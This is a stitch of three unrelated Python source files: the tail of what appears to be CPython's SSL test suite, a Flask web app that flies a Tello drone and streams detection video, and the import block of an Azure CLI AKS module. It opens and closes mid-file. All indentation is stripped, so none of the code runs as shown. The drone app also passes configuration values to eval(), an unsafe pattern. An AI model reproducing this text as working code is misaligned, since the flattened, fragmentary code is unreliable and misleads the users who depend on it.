client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first conncetion without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
app.py
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) 2014 Miguel Grinberg
#
# Released under the MIT license
# https://github.com/miguelgrinberg/flask-video-streaming/blob/master/LICENSE
#
###############################################################################
from flask import Flask, Response, render_template, request, jsonify
from lib.camera import VideoCamera
import argparse
import configparser
import socket
import json
import sys
import threading
import re
from time import sleep
from logging import getLogger, basicConfig, DEBUG, INFO
from lib.args import build_argparser
from lib import interactive_detection
from openvino.inference_engine import get_version
app = Flask(__name__)
config = configparser.ConfigParser()
config.read('tello.cfg')
flip_code = eval(config.get('camera', 'flip_code'))
tello_addr = eval(config.get('tello', 'tello_addr'))
speed = eval(config.get('tello', 'speed'))
config = configparser.ConfigParser()
config.read('color.ini')
colors = config.sections()
logger = getLogger(__name__)
basicConfig(
level=INFO,
format="%(asctime)s %(levelname)s %(name)s %(funcName)s(): %(message)s")
distance = 20
move_command = ("up", "down", "left", "right", "back", "forward", "cw", "ccw")
is_connected = False
is_streamon = False
is_stream = True
is_tracking = False
is_test = False
is_async_mode = True
is_object_detection = False
is_face_detection = False
is_age_gender_detection = False
is_emotions_detection = False
is_head_pose_detection = False
is_facial_landmarks_detection = False
flip_code = None # filpcode: 0,x-axis 1,y-axis -1,both axis
tello_response = ""
devices = None
models = None
detections = None
def send_info(command, tello_response):
result = {
"command": command,
"result": tello_response,
"is_connected": is_connected,
"is_streamon": is_streamon,
"is_stream": is_stream,
"is_tracking": is_tracking,
"is_test": is_test,
"is_async_mode": is_async_mode,
"flip_code": flip_code,
"is_object_detection": is_object_detection,
"is_face_detection": is_face_detection,
"is_age_gender_detection": is_age_gender_detection,
"is_emotions_detection": is_emotions_detection,
"is_head_pose_detection": is_head_pose_detection,
"is_facial_landmarks_detection": is_facial_landmarks_detection
}
logger.info(
"cmd:{} res:{} con:{} streamon:{} stream:{} tracking:{} test:{} \
ssd:{} face:{} ag:{} em:{} hp:{} lm:{} async:{} flip:{}"
.format(command, tello_response, is_connected, is_streamon, is_stream,
is_tracking, is_test, is_object_detection, is_face_detection,
is_age_gender_detection, is_emotions_detection,
is_head_pose_detection, is_facial_landmarks_detection,
is_async_mode, flip_code))
return result
def send_command(command):
command = command.encode(encoding="utf-8")
s.sendto(command, (tello_addr))
logger.info("sent:{}".format(command))
sleep(0.1)
def gen(camera):
while True:
frame = camera.get_frame(is_stream, is_tracking, is_test, speed,
is_async_mode, flip_code, is_object_detection,
is_face_detection, is_age_gender_detection,
is_emotions_detection, is_head_pose_detection,
is_facial_landmarks_detection)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
@app.route('/')
def index():
global is_connected
global is_streamon
logger.info(
"is_connected:{} is_streamon:{}".format(is_connected, is_streamon))
return render_template(
'index.html',
is_streamon=is_streamon,
is_connected=is_connected,
is_async_mode=is_async_mode,
devices=devices,
models=models,
enable_detection=enable_detection)
@app.route('/video_feed')
def video_feed():
camera = VideoCamera(s, algorithm, target_color, is_stream, is_test, speed,
detections)
return Response(
gen(camera), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/tellooo', methods=['POST'])
def tellooo():
global is_connected
global is_streamon
global speed
global distance
command = request.json['command']
if command in move_command:
command = command + " " + str(distance)
if re.search(r'speed \d+', command):
command = re.search(r'speed \d+', command).group(0)
speed = int(command.split(" ")[1])
if re.search(r'distance \d+', command):
command = re.search(r'distance \d+', command).group(0)
distance = int(command.split(" ")[1])
if re.search(r'flip [l,r,f,b]', command):
command = re.search(r'flip [l,r,f,b]', command).group(0)
send_command(command)
if command == 'command' and tello_response == 'ok':
is_connected = True
if command == 'streamon' and tello_response == 'ok':
is_streamon = True
if command == 'streamoff' and tello_response == 'ok':
is_streamon = False
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/info', methods=['POST'])
def info():
command = request.json['command']
send_command(command)
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/flip', methods=['POST'])
def flip():
global flip_code
command = request.json['command']
if command == "flip" and flip_code is None:
flip_code = 0
tello_response = "around x-axis"
elif command == "flip" and flip_code == 0:
flip_code = 1
tello_response = "around y-axis"
elif command == "flip" and flip_code == 1:
flip_code = -1
tello_response = "around both-axis"
elif command == "flip" and flip_code == -1:
flip_code = None
tello_response = "reset"
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/tracking', methods=['POST'])
def tracking():
global is_stream
global is_test
global is_tracking
global is_object_detection
global is_face_detection
tello_response = "on"
command = request.json['command']
if command == "streaming":
is_stream = True
is_tracking = False
is_test = False
is_object_detection = False
is_face_detection = False
elif command == "tracking":
is_stream = False
is_tracking = True
is_test = False
is_object_detection = False
is_face_detection = False
elif command == "test":
is_stream = False
is_tracking = True
is_test = True
is_object_detection = False
is_face_detection = False
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
@app.route('/detection', methods=['POST'])
def detection():
global is_async_mode
global is_stream
global is_tracking
global is_test
global is_object_detection
global is_face_detection
global is_age_gender_detection
global is_emotions_detection
global is_head_pose_detection
global is_facial_landmarks_detection
tello_response = "on"
command = request.json['command']
if is_object_detection or is_face_detection:
if command == "async":
is_async_mode = True
elif command == "sync":
is_async_mode = False
if command == "object_detection":
is_stream = False
is_tracking = False
is_test = False
is_object_detection = True
is_face_detection = False
if command == "face_detection":
is_stream = False
is_tracking = False
is_test = False
is_object_detection = False
is_face_detection = True
if is_face_detection:
if command == "age_gender_detection":
is_age_gender_detection = not is_age_gender_detection
if command == "emotions_detection":
is_emotions_detection = not is_emotions_detection
if command == "head_pose_detection":
is_head_pose_detection = not is_head_pose_detection
if command == "facial_landmarks_detection":
is_facial_landmarks_detection = not is_facial_landmarks_detection
result = send_info(command, tello_response)
return jsonify(ResultSet=json.dumps(result))
if __name__ == '__main__':
args = build_argparser().parse_args()
algorithm = args.algorithm
target_color = args.color
is_test = args.test
enable_detection = args.enable_detection
if enable_detection:
devices = [
args.device, args.device, args.device_age_gender,
args.device_emotions, args.device_head_pose,
args.device_facial_landmarks
]
models = [
args.model_ssd, args.model_face, args.model_age_gender,
args.model_emotions, args.model_head_pose,
args.model_facial_landmarks
]
# openvino.inference_engine version '2.1.37988' is openvino_2020.1.033 build
# , which does not need cpu extension.
# https://software.intel.com/en-us/forums/intel-distribution-of-openvino-toolkit/topic/848825
if "CPU" in devices and args.cpu_extension is None and (get_version() < '2.1.37988'):
print(
"\nPlease try to specify cpu extensions library path in demo's command line parameters using -l "
"or --cpu_extension command line argument")
sys.exit(1)
# Create detectors class instance
detections = interactive_detection.Detections(
devices, models, args.cpu_extension, args.plugin_dir,
args.prob_threshold, args.prob_threshold_face, is_async_mode)
models = detections.models # Get models to display WebUI.
# Create a UDP socket to send and receive message with tello
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
host = '0.0.0.0'
port = 9000
s.bind((host, port))
def recv():
global tello_response
while True:
try:
tello_response, server = s.recvfrom(1518)
tello_response = tello_response.decode(encoding="utf-8")
logger.info("res:{}".format(tello_response))
except Exception:
print('\nExit . . .\n')
break
recvThread = threading.Thread(target=recv)
recvThread.start()
app.run(host='0.0.0.0', threaded=True)
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core._profile import Profile
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_05_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
MaintenanceConfiguration,
TimeInWeek,
TimeSpan,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity,
RunCommandRequest,
ManagedClusterPropertiesIdentityProfileValue)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, CONST_SECRET_ROTATION_ENABLED
